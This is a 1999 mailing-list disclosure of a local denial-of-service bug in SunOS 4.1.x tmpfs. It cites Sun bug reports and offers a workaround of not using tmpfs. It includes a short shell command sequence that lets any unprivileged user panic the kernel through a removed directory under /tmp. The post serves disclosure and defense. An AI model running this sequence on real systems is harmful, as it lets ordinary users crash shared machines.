SunOS 4.1.3 and 4.1.4 tmpfs DoS

From: Timothy Demarest (demarestat_private)
Date: Fri Sep 03 1999 - 11:06:45 PDT

    While searching SunSolve for a completely unrelated issue, I came across
    two bug reports (1115820, 1111248) that describe a way for any user to
    panic a system running SunOS 4.1.1, 4.1.3, 4.1.3_U1, and 4.1.4. While the
    bugs have been reported to Sun, no patch is available. There is a simple
    workaround, if you dont' require tmpfs.

    I have never seen this reported, so it might be good to share this with a
    wider audience. I don't want my users using this as a DoS against our older
    servers.

    Requirements:

     - The system must have /tmp mounted on swap (tmpfs)
     - /tmp must be writable by the UID that will crash the machine. Since tmp
       is frequently has full permissions (drwxrwxrwt), this is fairly common

    How to panic the system:

    cd /tmp
    mkdir xx
    cd xx
    rmdir ../xx
    touch yy
    cd /

    The system will then panic with "assertion failed: tp->tn_dir == NULL,
    file: ../../tmpfs/tmp_tnode.c, line: 167" (from SunOS 4.1.4).

    The workaround:

    As specified in the bug reports, "do not use tmpfs."

    I tested this only on SunOS 4.1.4 systems, but the bug reports list other
    SunOS 4.1.x versions as well.

    TIm

    --
    Timothy Demarest                      ArrayComm, Inc.
    demarestat_private                3141 Zanker Road